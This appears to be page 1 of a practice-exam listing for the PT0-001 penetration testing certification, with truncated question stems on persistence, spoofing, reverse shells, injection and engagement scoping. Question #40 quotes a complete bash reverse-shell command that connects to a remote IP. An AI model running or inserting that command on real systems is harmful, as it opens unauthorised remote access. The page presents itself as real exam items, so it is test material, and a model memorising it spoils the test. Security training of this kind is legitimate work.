PT0-001 Practice Questions
248 real PT0-001 exam questions with expert-verified answers and explanations. Page 1 of 5.
- Question #1Post-exploitation and lateral movement
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
Windows persistenceregistryschtaskspost-exploitation - Question #2Engagement management
A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?
wireless testingscopingengagement planningESSID - Question #3Vulnerability discovery and analysis
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nucle...
ICS securityOT securityindustrial control systemssecurity weaknesses - Question #4Vulnerability discovery and analysis
A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a...
CVSS scoringexploit difficultyvulnerability assessmentrisk scoring - Question #5Post-exploitation and lateral movement
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regai...
Windows persistenceregistry run keyservices persistencepost-exploitation - Question #6Attacks and exploits
Which of the following tools is used to perform a credential brute force attack?
credential brute forceHydrapassword attacksauthentication attacks - Question #7Engagement management
Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO.)
engagement communicationrules of engagementincident escalationscope management - Question #8Vulnerability discovery and analysis
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not...
vulnerability prioritizationrisk managementremediation planningcritical vulnerabilities - Question #9Post-exploitation and lateral movement
Which of the following is the reason why a penetration tester would run the chkconfig --del command at the end of an engagement? servicename
Linux persistencechkconfigservice managementcleanup - Question #10Attacks and exploits
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
NETBIOSResponderLLMNR poisoningname service attacks - Question #11Engagement management
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the...
rules of engagementscope documentationengagement planningpentest scope - Question #12Post-exploitation and lateral movement
A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
insecure file permissionslocal privilege escalationLinux securityfile system - Question #13Vulnerability discovery and analysis
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
stored XSSweb application securityvulnerability prioritizationOWASP - Question #14Vulnerability discovery and analysis
A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the...
attack surface reductionservice hardeningport securityremediation recommendations - Question #15Attacks and exploits
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recomme...
SQL injectionweb application securityinput validationremediation - Question #16Engagement management
Black box penetration testing strategy provides the tester with:
black box testingpenetration testing methodologyengagement scopetesting approaches - Question #17Reconnaissance and enumeration
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
OSINTShodanMaltegoopen source intelligence - Question #18Attacks and exploits
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
ARP spoofingman-in-the-middlenetwork attacksgateway spoofing - Question #19Post-exploitation and lateral movement
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies wou...
lateral movementmitigation strategiesMFAprivilege management - Question #20Attacks and exploits
A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
pass the hashcredential attackslateral movementWindows authentication - Question #21Attacks and exploits
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below: IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168....
ARP spoofingMITM attackarpspoofnetwork layer attacks - Question #22Engagement management
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwilling...
IPS whitelistingengagement scopecompliance testingpenetration test planning - Question #23Engagement management
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a c...
ICS securityOT assessmentoperational technologysafety considerations - Question #24Vulnerability discovery and analysis
A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following cond...
HIPAA compliancePHI protectionDAR encryptiondata in transit - Question #25Attacks and exploits
Which of the following is an example of a spear phishing attack?
spear phishingsocial engineeringsmishingtargeted attacks - Question #26Vulnerability discovery and analysis
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test th...
XML parsingSOAP messagesweb application testinginput validation - Question #28Attacks and exploits
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetra...
reverse shellnetcatcommand injectionweb application exploitation - Question #29Vulnerability discovery and analysis
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
IoT securityhardware constraintssecurity by designembedded systems - Question #30Attacks and exploits
Which of the following commands starts the Metasploit database?
Metasploitmsfconsoleexploitation frameworkdatabase initialization - Question #31Vulnerability discovery and analysis
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. Th...
Android securityAPK analysisSASTmobile application testing - Question #32Vulnerability discovery and analysis
A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results a...
vulnerability scanningweb server configurationinformation disclosureattack prioritization - Question #33Engagement management
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetrati...
penetration test reportexecutive summaryrisk reportingreport structure - Question #34Reconnaissance and enumeration
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and ou...
web application testinghidden fieldsblack box testingHTTP reconnaissance - Question #35Post-exploitation and lateral movement
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10...
X11 forwardingSSH tunnelingremote GUI accesslateral movement - Question #36Attacks and exploits
A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given th...
forced browsingauthorization bypassaccess controlweb application security - Question #37Post-exploitation and lateral movement
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim bac...
reverse shellbash TCP redirectport 443firewall evasion - Question #38Attacks and exploits
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration...
Content Security Policyclickjackingweb security headersmissing security controls - Question #39Engagement management
Which of the following are MOST important when planning for an engagement? (Select TWO).
engagement planningimpact tolerancescope definitioncompany policies - Question #40Post-exploitation and lateral movement
The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describe...
bash reverse shellTCP redirectcommand analysisTTY redirection - Question #41Attacks and exploits
Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?
physical securitylock bypassunder-the-door toolphysical intrusion - Question #42Engagement management
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
client communicationcritical findingsincident handlingscope management - Question #43Attacks and exploits
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the vic...
evil twinHTTP downgradeSSL strippingwireless attack - Question #44Post-exploitation and lateral movement
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass." -sr-xr-x 1 root ro...
SUID exploitationPATH hijackingprivilege escalationLinux - Question #45Reconnaissance and enumeration
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
DNS enumerationPTR recordsreverse DNSscripting - Question #46Vulnerability discovery and analysis
Given the following Python script: Which of the following is where the output will go?
Python scriptingoutput redirectioncode analysis - Question #47Vulnerability discovery and analysis
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of e...
HTTP methodscredential exposureGET vs POSTweb security - Question #48Vulnerability discovery and analysis
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
static analysisSASTcode reviewvulnerability scanning - Question #49Attacks and exploits
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: Which of the following remediation steps should be taken to prevent this type...
open redirectWAFURL redirectionweb vulnerabilities - Question #50Vulnerability discovery and analysis
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration te...
discovery scancompliance scanningsoftware baselinenetwork scanning - Question #51Engagement management
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over...
phishing remediationpassword policyVPN cipher suitesecurity awareness